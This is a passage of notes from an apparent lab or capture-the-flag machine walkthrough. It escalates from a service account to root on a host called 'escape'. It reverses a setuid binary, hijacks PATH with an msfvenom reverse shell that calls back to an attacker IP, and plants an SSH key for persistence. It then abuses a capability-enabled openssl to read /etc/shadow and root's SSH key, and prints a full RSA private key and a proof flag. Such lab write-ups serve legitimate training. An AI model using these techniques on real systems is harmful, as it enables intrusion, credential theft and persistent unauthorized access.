printf@@GLIBC_2.2.5
fputs@@GLIBC_2.2.5
geteuid@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
fgets@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
setreuid@@GLIBC_2.2.5
__bss_start
main
setvbuf@@GLIBC_2.2.5
get_output
popen@@GLIBC_2.2.5
fopen@@GLIBC_2.2.5
__isoc99_scanf@@GLIBC_2.7
fwrite@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

$ ldd /usr/bin/logconsole
ldd /usr/bin/logconsole
linux-vdso.so.1 (0x00007fffe0f6e000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fd2e31c2000)
/lib64/ld-linux-x86-64.so.2 (0x00007fd2e35b3000)

$ ls -la /usr/bin/logconsole
-rwsrwxr-x 1 tom tom 17440 Dec 9 14:16 /usr/bin/logconsole
// Copy this binary to my host Ubuntu (using base64) to use IdaPro 64 bit

-> There are 2 functions: main() and get_output()

● main() gets options entered by the user, and invoke the corresponding command,
then call get_output()
● get_output() opens “/home/tom/logconsole.txt” and append (see “a” option)
outputs to this file. However this file is not created and with the current shell, we
can’t create a new file in /home/tom ??? After appending to the file, this function
invokes fgets() to read 4096 characters (maybe the log file is too short and it is the
root cause of SegFault?)
○ How to check whether the get_output() is invoked ?
○ How to create logconsole.txt ? It seems that we have not created this file
yet
// Take a look at commands we run to get the logs, only lscpu is run without specifying the
absolute path (/usr/bin/lscpu).
-> Idea: we can create a reverse shell named lscpu, and then update the $PATH and then
select option 6 to trigger the reverse shell

// Generate reverse shell binary, named lscpu

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.243 LPORT=8082 -f
elf > lscpu

// Download our binary lscpy and update $PATH

Debian-snmp@escape:/tmp$ export PATH=/tmp:$PATH
Debian-snmp@escape:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

// Run /usr/bin/logconsole and select option 6 to trigger our reverse shell -> we get the
new shell of user tom
// Generate SSH keypairs and add id_rsa.pub to /home/tom/.ssh/authorized_keys, so that
we can SSH to user tom without redoing every step and get a stable shell.
$ ssh-keygen

tom@escape:/home/tom$ mkdir .ssh; cd .ssh

tom@escape:/home/tom/.ssh$ echo "ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABgQDOdvzrLGiPCeHb3JwgXbelA3b/tm9xZRc
vdeZuEOU8mc4RZmkSz/UyRgOL7HqJDgZ1hi8705hNh5Z79ZhwClC39th0nfwtQWxd
C2/1fYvyXOEJn7jT5rkF+8Wpz77iY8bfvhGEjLUjzLoMOcm1PDWFMX8ZZQr2HA0FCile
FbZ7F0HdEafGiTxST3+swV7ZH5DcrvY9qJqv0ioBQwgU76pVAJ58U+DggKszmr4Rv3
vUmOv/NaL/o0E0LubA0gAdfsPyIMeXlG8yYmDXpxqaxsYvxLPTvEWIdcdxYBXzRXVp
gW0U4SEcFBbZ3oa3rGVB7rxis+C0OQMeahTUM9izjEtlSSpdmJAI+xrqQuJ5qPVmPt
3VYol0JsO9RORWHqmsk7GKXr1hBHR/Cq0rxeTkP1GiA0cvJqIuX+55LkdtDQH923oo
pNbQ55O02MCZUiwpNscpyLh8+bWjhiVJ0GUGEUQmLVAadNTaCkKHJufaBXKrCVR
5Mtre0c/6o2qoq8pb/98= kali@kali" > authorized_keys

$ chmod 600 id_rsa

$ ssh -i id_rsa tom@192.168.243.113

/usr/bin/mtr-packet = cap_net_raw+ep
/opt/cert/openssl =ep

Read more:
● https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities
● https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-open
ssl-with-selinux-enabled-and-enforced-74d2bec02099
● https://gtfobins.github.io/gtfobins/openssl/
tom@escape:/$ cd /tmp
tom@escape:/tmp$ /opt/cert/openssl req -x509 -newkey rsa:2048 -keyout key.pem
-out cert.pem -days 365 -nodes
Can't load /home/tom/.rnd into RNG
139891892191680:error:2406F079:random number generator:RAND_load_file:Cannot
open file:../crypto/rand/randfile.c:88:Filename=/home/tom/.rnd
Generating a RSA private key
.........................................+++++
....+++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
// Just press Enter to skip values of Country Name, …, Email Address
-> Generate 2 files: cert.pem and key.pem

// Now let’s start a server so we can read files…

tom@escape:/tmp$ cd /
tom@escape:/$ /opt/cert/openssl s_server -key /tmp/key.pem -cert /tmp/cert.pem
-port 1337 -HTTP
Using default temp DH parameters
ACCEPT
FILE:etc/shadow
FILE:root/proof.txt
FILE:root/.ssh/id_rsa
...

// SSH to tom’s shell on another terminal and read file using curl on localhost on port 1337
(we use -k to ignore ssl errors)
tom@escape:~$ curl -k "https://127.0.0.1:1337/etc/shadow"
tom@escape:~$ curl -k "https://127.0.0.1:1337/root/proof.txt"
tom@escape:~$ curl -k "https://127.0.0.1:1337/root/.ssh/id_rsa"

// File /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAwwvvVIS3//uz+Mpg24l51p48akveZgI8bDQDun7y9BKhRDWg
GzIzCpt7NcVWVN2llo9KOL3c3EZZxGOaTbzpINZxSWj3/WWBYhNqmKQRsgJzbPv2
kOe/XwWw8Bt9TuFAd7GUbylpbyHOES7siXFUd/XP503ehllp/JFp0G+2YPkYPGbi
0EISJcNFPNnRlXIQs3Fte0QqFiPE9nPycSMqvGz8a9OtaPGlmOZ3wP56jxxIBT0I
SrkfuLGw7b9VN05jJ33EMtDGRyyDLljFXv7t5OktkC0omumXyWG2KRRe3Avn4RMI
V+IE0rS8N2pIymRF3u8U/9YMX/Ps2EPvNQFkTQIDAQABAoIBAQCXXa/Ce6z/76pf
rU81kJ8JO4vPQkm6CIozvroWBWcumzaj5Kn38SFDXh5kQF0bR1e2XEVRe6bnG4GW
s2WQZsbVQRZxzhCGiju6jS7wfoNtDhHdxjw3gGI3sAb8j5jTmmOZgCqdihnUsPtm
wm+2ykivQAi0jO3gfYuPApqHs+ppngt2KeMUZesIz4BWuFAnS0ePK/tpTHpZ4KRj
D/sb1kdseaCmPfOD6oTMGNtTiakkDUzObN3Pw19v5wkHfawTbmsSeiPmW1nC5xh/
OI7K+wbVUCj3Dys3xqKoCMK27y+pYHzzoiz7ol+OitIth6ucDe6NC6cFbVPmW2o0
fk+U8VbRAoGBAOcfAlARjYV6qc2ukF9NYlVy/WYoP3zFzfb7uYu9I1OpLID+PYeN
ixpqKKgRoxM+ndsWWnyHjw5Kyq2+DHBE67OOpbd69y+fUYOhFiSH2TnQsB1LPtkH
ZT0pZyaBavQLZFZChpOeQ96qfEw5xwA65zENCSFoGoILHS92akVmWQnTAoGBANgK
0qNNsJYETJSob/KdnMYXbE3tPjNkdCzKXXklgZXeUKn6U//0vRhJWZGHv8RDWrlh
1wc9Op88Dx003Ay+3vVqjOs7ur46KankMTj+PN5B5CX1CioXtJ9T6qRF+8+46oq7
pXBTqfi7Gp2m+RuQJS9Ct2bu6OUYgGdUzQ8p/+VfAoGAOhCnUxhl1sAPgxY1PUxC
xTcDhLPd52oGqeNqJTpacr1Q6gN1z+V2qic7maX8s2wK2q0OBLVF8pBFxUq280nN
caoH5kXlbjh3kTtaRck/gO/2HxX1by8Vdz08pgbjqPZnuegyyUl8wadRXREy9tLV
nJQq1BLEfiFurqrwXgktm3MCgYEAroDPcyilogcG9Gy5P/cfUsJIsQkYXNqfHC65
IcmxyiQwc5vHjc9ZjexxdKN5ukXNWkA1N5u1ZjlU2/p+Y60o2oKeIMO2K0E/tgKj
36077Sq75gzvkOBk/O0Dcn000KxEhprbHsf1WvuGnCDqxeDAqFPzYClJ5QLNdKmC
mOUL1XECgYB1wX6H2xWJ+GvC1qKVs4WOYjfCvVZTh+9i8CpA1i4xmmmXXnc+jy/O
Bl7VLsdfeQ3L/NOBTng09PO2lwSWdghCMeS25rMm6/xZTOduauGVTMKx4DT7FvX6
NLU86rcVJCcqL0LdcJ7/2tmwsyuqhCLQ0fl37ZCS93LTXqGUzXfViw==
-----END RSA PRIVATE KEY-----
// Now we can ssh to root user
Proof.txt: 2852da9b1760e3d18273681475109ebc